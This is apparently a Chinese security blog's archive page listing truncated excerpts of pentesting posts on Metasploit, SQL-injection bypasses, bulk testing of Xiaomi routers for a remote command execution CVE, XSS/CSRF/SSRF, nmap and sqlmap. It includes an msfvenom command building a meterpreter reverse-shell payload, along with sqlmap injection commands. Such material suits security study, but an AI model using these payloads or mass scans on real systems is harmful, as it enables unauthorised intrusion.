04 2022 档案
摘要:msf使用详解 msfupdate #msf更新 msfconsole #进入控制台 search 0708 #搜索相关漏洞 info #查看模块信息 生成payload: Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的I
阅读全文
摘要:sql注入的绕过方式 注释符号绕过 在sql中常用的注释符号有 --、#、/*xxx*/、; 大小写绕过 当web正则过滤的时候对大小写不敏感的情况下使用,一般很少会有这种漏洞 比如当过滤了select的时候我们可以采用SEleCT来查询 内联注释绕过 内联注释就是把一些特有的仅在MYSQL上的语句
阅读全文
摘要:结合fofa搜索引擎批量测试小米路由器-CVE-2019-18370漏洞 摘要 小米系列路由器远程命令执行漏洞(CVE-2019-18370,CVE-2019-18371) 漏洞发现时间:2019-03-09 在小米系列路由器(最新版开发版/稳定版)中存在漏洞,可以实现无需登录,任意远程命令执行。
阅读全文
摘要:xss和csrf的关系 xss(跨站脚本攻击) 简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss分类 反射型 <非持久化>攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链
阅读全文
摘要:信息收集 简介 在渗透与测试工作中,首先进行的应该就是信息收集, 一是全面统计资产, 二就是知己知彼方能百战不殆。 信息收集的完成度直接关系到我们入侵的成功率,渗透测试中有一门学问叫社会工程学,社工就是和信息收集有关。 针对一个渗透目标的信息收集 收集ip信息 当你有了一个渗透目标,先不要急于去攻击
阅读全文
摘要:nmap工具 nmap简介 官方介绍: Nmap(“网络映射器”)是免费开放源代码(许可证)实用程序,用于网络发现和安全审核。许多系统和网络管理员还发现它对于诸如网络清单,管理服务升级计划以及监视主机或服务正常运行时间之类的任务很有用。 Nmap以新颖的方式使用原始IP数据包来确定网络上可用的主机,
阅读全文
摘要:title: csrf,ssrf小结 date: 2021-03-17 20:17:40 keywords:css csrf csrf,ssrf小结 csrf和ssrf的区别 csrf 概念 CSRF跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的
阅读全文
摘要:title: sql详解 date: 2021-03-29 20:00:47 keywords:sqlmap sqlmap -r http.txt *#http.txt是我们抓取的http的请求包* sqlmap -r http.txt -p username *#指定参数,当有多个参数而你又知道u
阅读全文